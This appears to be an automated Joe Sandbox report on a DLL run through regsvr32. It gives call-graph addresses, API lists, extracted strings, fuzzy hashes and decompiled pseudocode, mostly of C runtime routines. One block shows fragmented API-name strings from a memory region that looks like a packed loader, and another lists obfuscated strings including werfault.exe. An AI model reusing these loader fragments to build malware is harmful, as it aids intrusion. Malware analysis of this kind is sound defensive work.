17916->17918 17917->17915 17917->17916 17918->17915 17919 7ffa52464f90 17918->17919 17920 7ffa52464f64 17918->17920 17941 7ffa5246ba60 17919->17941 17926 7ffa5246bc30 17920->17926 17923 7ffa52464fa6 17923->17915 17924 7ffa52464fba HeapSize 17923->17924 17924->17915 17925->17913 17927 7ffa5246bc50 17926->17927 17928 7ffa5246bc5f 17926->17928 17952 7ffa5246abf0 17927->17952 17929 7ffa5246bc67 17928->17929 17935 7ffa5246bc78 17928->17935 17931 7ffa5246c020 _free_base 2 API calls 17929->17931 17938 7ffa5246bc5a _get_errno_from_oserr 17931->17938 17932 7ffa5246bcba 17934 7ffa5246abb0 _callnewh DecodePointer 17932->17934 17933 7ffa5246bc9a HeapReAlloc 17933->17935 17934->17938 17935->17932 17935->17933 17936 7ffa5246bce4 17935->17936 17939 7ffa5246abb0 _callnewh DecodePointer 17935->17939 17940 7ffa5246bd1f GetLastError 17935->17940 17937 7ffa5246bcee GetLastError 17936->17937 17936->17938 17937->17938 17938->17915 17939->17935 17940->17938 17942 7ffa5246ba76 17941->17942 17943 7ffa5246bacc 17942->17943 17944 7ffa5246bb07 17942->17944 17947 7ffa5246bd70 _invalid_parameter 17 API calls 17943->17947 17945 7ffa5246bb32 HeapSize HeapReAlloc 17944->17945 17949 7ffa5246bb00 _get_errno_from_oserr 17944->17949 17946 7ffa5246bb74 17945->17946 17945->17949 17948 7ffa5246bba0 GetLastError 17946->17948 17958 7ffa5246bbd0 HeapQueryInformation 17946->17958 17947->17949 17948->17949 17949->17923 17953 7ffa5246ac4d 17952->17953 17955 7ffa5246ac0a 17952->17955 17954 7ffa5246abb0 _callnewh DecodePointer 17953->17954 17956 7ffa5246ac21 17954->17956 17955->17956 17957 7ffa5246abb0 _callnewh DecodePointer 17955->17957 17956->17938 17957->17955 17959 7ffa5246bb90 17958->17959 17959->17948 17959->17949 17960 7ffa5246a7e9 17961 7ffa5246a7f9 17960->17961 17962 7ffa5246a80a 17961->17962 17963 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17961->17963 17964 7ffa5246aa30 17963->17964 18285 7ffa524670e6 18286 7ffa52467090 _exit 33 API calls 18285->18286 18287 7ffa524670f0 18286->18287 
18763 7ffa524775e9 18764 7ffa524775f4 18763->18764 18767 7ffa524775fb 18763->18767 18765 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18764->18765 18766 7ffa52477d85 18765->18766 18768 7ffa5246bd70 _invalid_parameter 17 API calls 18767->18768 18768->18764 17185 7ffa52467ae3 17188 7ffa52467af3 17185->17188 17186 7ffa52467ce0 SetHandleCount 17187 7ffa52467c74 17186->17187 17188->17186 17189 7ffa52467b95 GetStdHandle 17188->17189 17191 7ffa52467c7b 17188->17191 17190 7ffa52467bb9 17189->17190 17189->17191 17190->17191 17192 7ffa52467bc8 GetFileType 17190->17192 17191->17186 17192->17191 17193 7ffa52467beb InitializeCriticalSectionAndSpinCount 17192->17193 17193->17187 17193->17191 18288 7ffa524744e5 18293 7ffa5247445a __SehTransFilter 18288->18293 18289 7ffa524747d7 18290 7ffa5247485b 18289->18290 18291 7ffa5246cf80 _inconsistency 36 API calls 18289->18291 18291->18290 18292 7ffa5247466c __SehTransFilter 18292->18289 18294 7ffa52475bb0 __SehTransFilter 36 API calls 18292->18294 18293->18292 18295 7ffa52475180 __SehTransFilter 38 API calls 18293->18295 18296 7ffa52474727 18294->18296 18295->18293 18296->18289 18297 7ffa5246e500 __GetUnwindTryBlock 37 API calls 18296->18297 18298 7ffa52474767 18297->18298 18299 7ffa5246edc0 __SehTransFilter 9 API calls 18298->18299 18299->18289 17199 7ffa524712e3 LoadLibraryW 17200 7ffa524712fd 17199->17200 17201 7ffa52471304 GetProcAddress 17199->17201 17203 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17200->17203 17201->17200 17202 7ffa5247132a 7 API calls 17201->17202 17204 7ffa524713d5 17202->17204 17205 7ffa524713b3 GetProcAddress EncodePointer 17202->17205 17206 7ffa5247157a 17203->17206 17207 7ffa524713f9 DecodePointer DecodePointer 17204->17207 17209 7ffa52471428 DecodePointer 17204->17209 17205->17204 17207->17209 17209->17200 18300 7ffa5246c990 18304 7ffa52464980 18300->18304 18302 7ffa5246c9b8 EncodePointer 18303 7ffa5246c9e5 18302->18303 18305 7ffa524649cb _calloc_dbg_impl 18304->18305 18305->18302 

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AllocAllocateBoundaryDeleteDescriptorExitHeapLibraryLoadMessageProcessVirtual
                                                                                • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                                                • API String ID: 3056597726-2032897877
                                                                                • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                                • Instruction ID: e77127591a7461ebb14c7dace4d55e73a23bdc28c442d7348f3eabf117fd809e
                                                                                • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                                • Instruction Fuzzy Hash: 7CE2C8B690A7C18FE3748F62AA917DD3AB0F346748F509208D3991FA1DCB795242CF85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.475983111.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_950000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                • API String ID: 394283112-2517549848
                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                • Instruction ID: 0591526eaa0f0d6c926ca358d636f41cf91e6602b8fce56eca9d4ce1cca58f1a
                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                • Instruction Fuzzy Hash: 6772D330618B488FDB29DF19C8856B9B7E1FB98305F14462DECCAC7211EB34E946CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FFA524633C2), ref: 00007FFA52468876
                                                                                • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA524633C2), ref: 00007FFA52468891
                                                                                • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA524633C2), ref: 00007FFA524688BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CreateInformationVersion
                                                                                • String ID:
                                                                                • API String ID: 3563531100-0
                                                                                • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                                • Instruction ID: fe635b942acff2b588f422a7f2664b4f03797a85762d977ea68a8b8f9db58e1f
                                                                                • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                                • Instruction Fuzzy Hash: B3F05E75A28A8292F714E710EC0937923F0BF5A344F94C434D55D826A8DEBDE58DC700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                                                • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                                                • API String ID: 1648969265-681193798
                                                                                • Opcode ID: 20ee21bbe844799f031897518e202e5835f501dc7c4be053d2fd605d6d6bfd94
                                                                                • Instruction ID: e2fe3f1adea1f0a850a00d46cd20bf3a93adc9fc5aa303b110d5d6ab92585996
                                                                                • Opcode Fuzzy Hash: 20ee21bbe844799f031897518e202e5835f501dc7c4be053d2fd605d6d6bfd94
                                                                                • Instruction Fuzzy Hash: 48516F32A2DB8195E750CB14E88072A77F0FB86B44F548135E69E87B9DCFBDE4458B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                                                • API String ID: 1823725401-2473407871
                                                                                • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                                • Instruction ID: ed156997b772b55426b6cde6189a1cb3ec5e6819e33946636e739e69bfa9a676
                                                                                • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                                • Instruction Fuzzy Hash: 4A41C732618B8586E750CF56F84432BB7F1FB8AB94F244025EA8D47B68DFBDE4448B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00007FFA52467540: _initp_misc_winsig.LIBCMTD ref: 00007FFA5246757B
                                                                                  • Part of subcall function 00007FFA52467540: _initp_eh_hooks.LIBCMTD ref: 00007FFA52467585
                                                                                  • Part of subcall function 00007FFA52468FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFA5246906F
                                                                                • FlsAlloc.KERNEL32 ref: 00007FFA52463D55
                                                                                  • Part of subcall function 00007FFA52463E00: FlsFree.KERNEL32 ref: 00007FFA52463E13
                                                                                  • Part of subcall function 00007FFA52463E00: _mtdeletelocks.LIBCMTD ref: 00007FFA52463E23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                                                                • API String ID: 3828364660-3898981997
                                                                                • Opcode ID: 3ed59da3ba66a1ca0ac497d939f2d07eba5cdbe6c68421ccf927512665642bdb
                                                                                • Instruction ID: 4da9770a164dc8c14e837780febecea0d83090f9dd9f049735d872a85525c5c9
                                                                                • Opcode Fuzzy Hash: 3ed59da3ba66a1ca0ac497d939f2d07eba5cdbe6c68421ccf927512665642bdb
                                                                                • Instruction Fuzzy Hash: 6111547093C68296F754AB64EC453792AF1BF87B50F18C631E56E426DDDFACF4048A10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 16%
                                                                                			E00007FFA7FFA5246F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
                                                                                				long long _v24;
                                                                                				intOrPtr _v32;
                                                                                				long long _v40;
                                                                                				signed int _v48;
                                                                                				int _v52;
                                                                                				int _v56;
                                                                                				signed int _v64;
                                                                                				long long _v72;
                                                                                				void* _t53;
                                                                                				long long _t82;
                                                                                
                                                                                				_a32 = r9d;
                                                                                				_a24 = __r8;
                                                                                				_a16 = __edx;
                                                                                				_a8 = __rcx;
                                                                                				_v56 = 0;
                                                                                				if (_a48 != 0) goto 0x5246f5ab;
                                                                                				_a48 =  *((intOrPtr*)( *_a8 + 4));
                                                                                				if (_a64 == 0) goto 0x5246f5bf;
                                                                                				_v32 = 9;
                                                                                				goto 0x5246f5c7;
                                                                                				_v32 = 1;
                                                                                				_v64 = 0;
                                                                                				_v72 = 0;
                                                                                				r9d = _a32;
                                                                                				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                                				if (_v48 != 0) goto 0x5246f60b;
                                                                                				goto 0x5246f6f8;
                                                                                				if (0 != 0) goto 0x5246f652;
                                                                                				if (_v48 <= 0) goto 0x5246f652;
                                                                                				if (_v48 - 0xfffffff0 > 0) goto 0x5246f652;
                                                                                				_t82 = _v48 + _v48 + 0x10;
                                                                                				_t53 = malloc(??); // executed
                                                                                				E00007FFA7FFA5246F3B0(_t53, 0xdddd, _t82);
                                                                                				_v24 = _t82;
                                                                                				goto 0x5246f65b;
                                                                                				_v24 = 0;
                                                                                				_v40 = _v24;
                                                                                				if (_v40 != 0) goto 0x5246f674;
                                                                                				goto 0x5246f6f8;
                                                                                				E00007FFA7FFA524632B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
                                                                                				_v64 = _v48;
                                                                                				_v72 = _v40;
                                                                                				r9d = _a32;
                                                                                				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                                				if (_v52 == 0) goto 0x5246f6ea;
                                                                                				r8d = _v52;
                                                                                				_v56 = GetStringTypeW(??, ??, ??, ??);
                                                                                				E00007FFA7FFA5246F3E0(_v40);
                                                                                				return _v56;
                                                                                			}














                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                                                                • String ID:
                                                                                • API String ID: 2618398691-0
                                                                                • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                                • Instruction ID: e10d01b7e00c09cd5deeda2b9ff5ce02b456a1ab92866fb5b53ccd20b5591cba
                                                                                • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                                • Instruction Fuzzy Hash: FD41083251C6818AD760DB15E48436AB7F0F786B94F148135EADE47BA8DFBCE8858F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName__initmbctable
                                                                                • String ID: C:\Windows\system32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                                                                • API String ID: 3548084100-462439500
                                                                                • Opcode ID: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                                • Instruction ID: 4dcc2292c810e8429a38437f981221ec8383db6a91aa33b4437f2148f400cc78
                                                                                • Opcode Fuzzy Hash: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                                • Instruction Fuzzy Hash: 27410121629A4591EA50DB14EC8037A77F0FB867A4F548736E6AE43BE8DFBDE144C700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 23%
                                                                                			E00007FFA7FFA5246A5E0(long long __rcx, void* _a8) {
                                                                                				signed int _v24;
                                                                                				char _v42;
                                                                                				void* _v48;
                                                                                				signed int _v56;
                                                                                				char _v312;
                                                                                				signed char* _v328;
                                                                                				char _v584;
                                                                                				char _v840;
                                                                                				char _v1352;
                                                                                				char _v1384;
                                                                                				char _v1392;
                                                                                				intOrPtr _v1400;
                                                                                				long long _v1408;
                                                                                				long long _v1416;
                                                                                				signed long long _t206;
                                                                                				signed char* _t214;
                                                                                				signed long long _t223;
                                                                                				intOrPtr _t225;
                                                                                				intOrPtr _t226;
                                                                                				signed long long _t233;
                                                                                
                                                                                				_t224 = __rcx;
                                                                                				_a8 = __rcx;
                                                                                				_t206 =  *0x5248b018; // 0x6ebca90f5d98
                                                                                				_v24 = _t206 ^ _t233;
                                                                                				if (GetCPInfo(??, ??) == 0) goto 0x5246a906;
                                                                                				_v56 = 0;
                                                                                				goto 0x5246a63c;
                                                                                				_v56 = _v56 + 1;
                                                                                				if (_v56 - 0x100 >= 0) goto 0x5246a661;
                                                                                				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
                                                                                				goto 0x5246a62c;
                                                                                				_v312 = 0x20;
                                                                                				_v328 =  &_v42;
                                                                                				goto 0x5246a68f;
                                                                                				_v328 =  &(_v328[2]);
                                                                                				if (( *_v328 & 0x000000ff) == 0) goto 0x5246a6ea;
                                                                                				_v56 =  *_v328 & 0x000000ff;
                                                                                				goto 0x5246a6c2;
                                                                                				_v56 = _v56 + 1;
                                                                                				_t214 = _v328;
                                                                                				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0x5246a6e8;
                                                                                				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
                                                                                				goto 0x5246a6b2;
                                                                                				goto 0x5246a67b;
                                                                                				_v1392 = 0;
                                                                                				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
                                                                                				_v1408 =  *((intOrPtr*)(_a8 + 4));
                                                                                				_v1416 =  &_v1352;
                                                                                				r9d = 0x100;
                                                                                				E00007FFA7FFA5246F4D0(1,  &_v1352, __rcx,  &_v312); // executed
                                                                                				_v1384 = 0;
                                                                                				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                                                				_v1400 = 0x100;
                                                                                				_v1408 =  &_v840;
                                                                                				_v1416 = 0x100;
                                                                                				r8d = 0x100;
                                                                                				E00007FFA7FFA5246EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
                                                                                				_v1384 = 0;
                                                                                				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                                                				_v1400 = 0x100;
                                                                                				_v1408 =  &_v584;
                                                                                				_v1416 = 0x100;
                                                                                				r8d = 0x200;
                                                                                				_t223 = _a8;
                                                                                				E00007FFA7FFA5246EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
                                                                                				_v56 = 0;
                                                                                				_v56 = _v56 + 1;
                                                                                				if (_v56 - 0x100 >= 0) goto 0x5246a901;
                                                                                				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0x5246a879;
                                                                                				_t225 = _a8;
                                                                                				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
                                                                                				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
                                                                                				goto 0x5246a8fc;
                                                                                				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0x5246a8e5;
                                                                                				_t226 = _a8;
                                                                                				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
                                                                                				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
                                                                                				goto 0x5246a8fc;
                                                                                				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
                                                                                				goto L1;
                                                                                				goto 0x5246aa20;
                                                                                				_v56 = 0;
                                                                                				_v56 = _v56 + 1;
                                                                                				_v56 = _v56 + 1;
                                                                                				if (_v56 - 0x100 >= 0) goto 0x5246aa20;
                                                                                				if (_v56 - 0x41 < 0) goto 0x5246a99c;
                                                                                				if (_v56 - 0x5a > 0) goto 0x5246a99c;
                                                                                				_v56 = _v56 + 1;
                                                                                				__rcx = _a8;
                                                                                				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
                                                                                				_v56 = _v56 + 1;
                                                                                				__rdx = _a8;
                                                                                				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                                                				_v56 = _v56 + 0x20;
                                                                                				__ecx = _v56;
                                                                                				__rdx = _a8;
                                                                                				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
                                                                                				goto 0x5246aa1b;
                                                                                				if (_v56 - 0x61 < 0) goto 0x5246aa04;
                                                                                				if (_v56 - 0x7a > 0) goto 0x5246aa04;
                                                                                				_v56 = _v56 + 1;
                                                                                				__rcx = _a8;
                                                                                				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
                                                                                				_v56 = _v56 + 1;
                                                                                				__rdx = _a8;
                                                                                				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                                                				_v56 = _v56 - 0x20;
                                                                                				__ecx = _v56;
                                                                                				__rdx = _a8;
                                                                                				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
                                                                                				goto 0x5246aa1b;
                                                                                				__eax = _v56;
                                                                                				__rcx = _a8;
                                                                                				 *((char*)(_a8 + __rax + 0x11d)) = 0;
                                                                                				goto L2;
                                                                                				__rcx = _v24;
                                                                                				__rcx = _v24 ^ __rsp;
                                                                                				return E00007FFA7FFA52463280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
                                                                                			}


                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $z
                                                                                • API String ID: 1807457897-2251613814
                                                                                • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                                • Instruction ID: 7687552d0a23a13589fb65a2f8db9786e1031432dcd143424dda828b354deb30
                                                                                • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                                • Instruction Fuzzy Hash: 04B1DB7261CAC0CAD775CB25E8507ABB7E0F789785F145125DACD83B89DB6CE4419F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                                                                • API String ID: 4112623284-4095683531
                                                                                • Opcode ID: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                                • Instruction ID: ee83308909762c07a79813b80b2aadfe827ba7cd9381565f135c2e5dd02e7377
